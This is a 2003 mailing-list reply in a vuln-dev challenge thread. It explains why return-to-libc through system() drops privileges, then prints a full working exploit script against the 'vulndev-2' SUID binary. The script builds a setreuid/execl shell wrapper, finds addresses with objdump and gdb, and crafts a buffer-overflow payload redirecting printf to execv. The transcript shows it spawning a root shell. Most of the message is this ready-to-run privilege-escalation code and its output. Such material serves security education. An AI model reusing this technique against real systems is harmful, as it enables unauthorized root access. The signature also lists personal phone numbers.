Re: [Vuln-dev Challenge] Challenge #2 (return-to-libc)

From: Joel Eriksson (je-vulndev_at_bitnux.com)
Date: 05/25/03

  • Next message: Discussion Lists: "Abo3 (can someone help me?)"
    Date: Sun, 25 May 2003 09:16:04 +0200
    To: vuln-dev@securityfocus.com
    
    

    Spacewalker and others who did a return-to-libc sploit for vulndev-2.
    Returning to system() means your command will be executed like this:

       /bin/sh -c blabla

    In Linux, /bin/sh is a symlink to bash. Recent versions of bash reset
    the EUID to the real UID. Many other shells also reset the EUID, since
    it's pretty common to execute /bin/sh in sploits (that's why shellcodes
    usually include a setuid-call before the exec, you know).

    Jon Erickson AKA Jose Ronnick exploited it "for real" though, and here's
    yet another working return-to-libc exploit, which uses a different approach.
    As usual, the sploit is fully automated.

    [je@vudo ~]$ cat expldev-2.sh
    #!/bin/sh
    #
    # Linux/x86 exploit for vulndev-2. Version 2 (return-to-libc).
    #
    # 2003-05-25 - Joel Eriksson (je at 0xbadc0ded.org)
    #

    [ $# -ge 1 ] && vul=$1 || vul=./vulndev-2 ; shift

    cat > expldev-2.c << EOF
    #include <unistd.h>
    #include <errno.h>
    int main(void)
    {
            setreuid(0, 0);
            execl("/bin/sh", "sh", NULL);
            perror("exec");
            return 1;
    }
    EOF
    gcc -o '%s
    ' expldev-2.c

    buf_size=90 # size of buffer
    pad_size=2 # align to word boundary
    num_reps=32 # &bfp - &buf may be > BFSIZE (padding/alignment)

    cp $vul $vul.tmp # Can't trace a SUID-binary, so use a temporary file.
    cat > expldev-2.gdb << EOF
    file $vul.tmp
    b main
    r
    p/x &execv
    q
    EOF
    addr_printf=0x$(objdump -R $vul | awk '$3 == "printf" { print $1 }')
    addr_execv=$(gdb -q -x expldev-2.gdb | sed -n '$,$s/.* = //p')
    rm -f expldev-2.gdb $vul.tmp

    perl -e 'print "\0\0\0\0" . pack("L", '$[addr_execv]')' > db.log

    arg1=$(perl -e '
            print "A" x ('$[buf_size + pad_size]') .
            pack("L", '$[addr_printf - 4]') x '$num_reps
    )

    $vul $arg1 ""
    [je@vudo ~]$ ./expldev-2.sh
    sh-2.05b# whoami
    root
    sh-2.05b# exit
    exit
    [je@vudo ~]$

    -- 
    Joel Eriksson
    -------------------------------------------------
    Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
    Security Research & Systems Development at Bitnux
    PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
    A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
    -------------------------------------------------
    

  • Next message: Discussion Lists: "Abo3 (can someone help me?)"